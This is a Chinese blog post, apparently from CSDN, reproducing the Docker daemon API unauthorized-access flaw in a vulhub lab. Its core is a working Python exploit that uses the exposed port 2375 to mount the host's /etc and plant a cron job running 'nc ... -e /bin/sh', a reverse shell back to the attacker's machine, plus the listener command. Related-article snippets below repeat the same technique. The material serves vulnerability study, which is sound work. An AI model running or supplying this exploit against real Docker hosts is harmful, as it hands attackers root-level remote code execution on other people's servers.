docker daemon api 未授权访问漏洞复现

最新推荐文章于 2024-08-04 18:34:53 发布
最新推荐文章于 2024-08-04 18:34:53 发布
阅读量2.4k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/107052047
版权

docker daemon api 未授权访问漏洞复现+

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/docker/unauthorized-rce/

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述
这里的访问http://127.0.0.1:2375/version
在这里插入图片描述
这里kali的ip192.138.164.134
centos的ip192.168.42.133
exp.py

import docker

client = docker.DockerClient(base_url='http://192.168.42.133:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.42.134 4444 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

在kali启动监听

nc -lvvp 4444

在这里插入图片描述

参考文章

https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md

whojoe
关注
专栏目录
web渗透测试漏洞复现docker API授权漏洞复现并getshell
HACKONE的博客
03-28 369
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
DOCKER REMeOTE API 授权访问漏洞复现
weixin_43061533的博客
12-01 747
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
利用Vulnhub复现漏洞 - docker daemon api 授权访问漏洞
JiangBuLiu的博客
07-02 1616
docker daemon api 授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md 漏洞原理 http://www.loner.fm/drops/#!/drops/1203.新...
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1572
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker Remote API 授权访问漏洞
最新发布
weixin_53736204的博客
08-04 342
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
docker daemon api 授权访问漏洞
EC_Carrot的博客
05-26 217
漏洞复现 利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。 利用EXP: import docker client = docker.DockerClient(base_url='http://attack-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc yo
Docker授权访问漏洞详解
m0_64481831的博客
06-11 1549
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
Docker授权攻击利用复现
echoonly1999的博客
08-31 288
环境配置 受害机:CentOS 攻击者:kali 配置docker配置文件,使得测试机存在授权访问 vim /usr/lib/systemd/system/docker.service 原本[Service] ExecStart参数 修改为 ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock 重启docker服务 systemctl daemon-reload systemctl restart d
docker remote API 漏洞复现
顶峰
04-03 385
引用网上的一些总结流程1. Docker是以root权限运行的,这是所有姿势的前提1.Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录,我们可以参考redis授权访问漏洞,将宿主机的/root/.ssh目录挂载到容器上,然后写入公钥。如果有web目录的话,最差也能上一个webshell。1.
授权访问漏洞
snowy_y的博客
06-23 932
授权访问
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 5356
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的DockerDocker-Compose,Kubernetes,Openshift项目,从而缩短从查找项目到在本地环境中初始化项目的路线
05-03
POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的DockerDocker-Compose,Kubernetes项目,从而缩短了从查找项目到在本地环境中初始化项目的路线。 很简单。 使用非常简单的命令行界面配置,运行和在项目之间切换。 灵活性强。 轻松管理,扩展和维护任何复杂性的项目。 配置一次,到处使用。 一次配置项目,以便团队其他成员将感受到零配置的价值。 特征 开箱即用的DockerDocker-Compose,Kubernetes,Helm支持。 Git,SVN支持开箱即用。 项目目录,多个目录。 创建您自己的项目目录。 无需其他工具即可组织您的项目。 多个计划。 为不同的环境甚至是出于演示目的的环境创建多个计划。 轻松地在计划(环境)之间切换。 简单的配置文件。 Poco有助于拆分配置文件,因此可以随时轻松维护和扩展它们。 脚本支持(挂钩
Docker Daemon API授权访问到RCE
Fly_鹏程万里
12-24 3122
影响范围 Docker ALL 漏洞类型 授权访问类 利用条件 REST API外置 漏洞概述 Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行 漏洞复现 环境搭建 下载环境 mkdir docker cd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/d..
Docker授权访问漏洞
Kevin's Blog
08-03 8795
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞概况二、攻击过程2.1 信息收集2.2 漏洞探测2.3 漏洞利用三、防御方法 一、漏洞介绍 1.1 漏洞成因   又叫Docker Remote API授权访问漏洞,此API主要目的是取代命令行界面;Dcoker swarm是docker下的分布化应用的本地集群,开放2375监听容器时,会调用这个API,方便的docker集群管理和扩展(绑定在0.0.0.0上,http会返回404page not fount) 1.2 漏洞概况 fofa搜索全国端口占有概况
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 2547
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2538
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker授权漏洞利用,ssh密钥连接
Docker API 授权访问漏洞复现
LuckySec
08-31 5469
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作DockerDocker API 授权访问漏洞分析和利用 0x02 环境准备 靶机环境:192.168.126.130 (ubuntu) 攻击环境:192.168.126.128 (kali) 在靶机上使用vulhub复现漏洞环境。 vulhub官网地址:https://vulhub.
Docker Remote API 漏洞分析:无授权访问风险
"Docker Remote API 授权漏洞全球探测1" Docker 是一个广泛应用的开源容器引擎,它采用Go语言编写,并遵循Apache 2.0许可证。Docker的主要功能是允许开发者将应用程序及其依赖打包到轻量级、可移植的容器中,这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值